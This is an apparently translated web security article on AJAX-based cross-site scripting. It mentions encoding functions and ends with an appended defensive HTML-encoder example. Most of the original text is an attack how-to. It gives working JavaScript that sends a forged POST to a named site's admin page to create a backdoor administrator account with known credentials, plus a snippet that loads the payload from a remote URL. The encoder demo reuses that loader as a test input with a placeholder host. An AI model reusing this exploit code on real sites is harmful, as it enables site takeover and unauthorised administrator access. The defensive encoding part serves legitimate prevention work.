Use and prevention of AJAX cross-site vulnerabilities

Source: Internet
Author: User

By lonely

Let's talk about how to prevent cross-site attacks. In ASP you can use the HTMLEncode function, in PHP you can use htmlspecialchars, and in ASP.NET you can use HTMLEncode. So-called cross-site (XSS) exists because the website's filtering of input is not strict: from the front end, specially constructed statements can be pushed through to the back-end database, or a faked view can be used to fool the administrator. Below, AJAX is introduced.

AJAX (Asynchronous JavaScript and XML) is a development technique used to build interactive web applications. It can update a page without refreshing it, and it can also be used to write an XSS worm.

To exploit this vulnerability, you must first find variables that are not strictly filtered, then use JavaScript hijacking to execute the data we construct, and use AJAX to simulate and submit the data to achieve our goal. Of course, we first need to capture packets for analysis, using Winsock Expert; this is similar to some CSRF attacks.

Winsock Expert is mainly used to find the submission address and the variables we need.

AJAX code:

```javascript
var request = false;

if (window.XMLHttpRequest) {
    request = new XMLHttpRequest();
    if (request.overrideMimeType) {
        request.overrideMimeType("text/xml");
    }
} else if (window.ActiveXObject) {
    // Older IE: try the MSXML ProgIDs in turn, keep the first that works
    var versions = ["Microsoft.XMLHTTP", "MSXML.XMLHTTP", "Microsoft.XMLHTTP",
                    "Msxml2.XMLHTTP.7.0", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.5.0", "Msxml2.XMLHTTP.4.0",
                    "MSXML2.XMLHTTP.3.0", "MSXML2.XMLHTTP"];
    for (var i = 0; i < versions.length; i++) {
        try { request = new ActiveXObject(versions[i]); break; } catch (e) {}
    }
}

var xmlhttp = request; // the XMLHttpRequest object
_add();                // call the add-administrator function

function _add() {
    var url = "/admin/adminuser/adminuser_add.asp"; // target website: www.2cto.com
    var myusername = "cnryan";
    var mypassword1 = "cnryan";
    var mypassword2 = "cnryan"; // must match mypassword1 for the add form to accept it
    var params = "username=" + myusername + "&password1=" + mypassword1 + "&password2=" + mypassword2 +
                 "&purview=url";
    xmlhttp.open("POST", url, true); // asynchronous request
    xmlhttp.setRequestHeader("Content-Length", params.length);
    xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xmlhttp.setRequestHeader("Connection", "close");
    xmlhttp.send(params); // send the data with POST, asynchronously
}
```

We can use the remote JS loading method:

```html
<script>
var s = document.createElement("script");
s.src = "url/ajax.js";
document.body.appendChild(s);
</script>
```
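As an added example that is not part of the original article, here is the prevention step the article recommends (HTMLEncode / htmlspecialchars) written as a small JavaScript encoder, applied to the remote-loader payload shown above. The page template, the placeholder host and the function names are constructed for the demonstration.

```javascript
// Added example, not part of the original article: an htmlspecialchars-style
// encoder (ENT_QUOTES behaviour: & < > " ' become entity references).
const HTML_ENTITIES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#039;",
};

function htmlEncode(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Render an untrusted value into a page template. `encode` false is the
// "filtering not strict" case from the article; true is the fixed page.
// The template must contain the placeholder {{value}}. A replacer function
// is used so that "$" sequences in the value are not interpreted by replace().
function renderPage(template, untrustedValue, encode) {
  const value = encode ? htmlEncode(untrustedValue) : untrustedValue;
  return template.replace("{{value}}", () => value);
}

// True when the rendered HTML still contains a live <script> tag, i.e. the
// browser would run it and the remote ajax.js loader would be fetched.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed sample input: the remote-loader payload from the article,
// with a placeholder host (example.invalid is reserved and never resolves).
const SAMPLE_PAYLOAD =
  '<script>var s=document.createElement("script");' +
  's.src="http://example.invalid/ajax.js";document.body.appendChild(s);</script>';
const TEMPLATE = '<p class="greeting">Welcome, {{value}}</p>';

// Compare the vulnerable and the encoded rendering of the same input.
function compareRenderings(untrustedValue) {
  const raw = renderPage(TEMPLATE, untrustedValue, false);
  const safe = renderPage(TEMPLATE, untrustedValue, true);
  return {
    rawExecutes: containsScriptTag(raw),
    safeExecutes: containsScriptTag(safe),
    safe,
  };
}

console.log(compareRenderings(SAMPLE_PAYLOAD));
```

The encoded rendering keeps the attacker's text visible as literal characters, so the page shows the string instead of loading the remote script.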
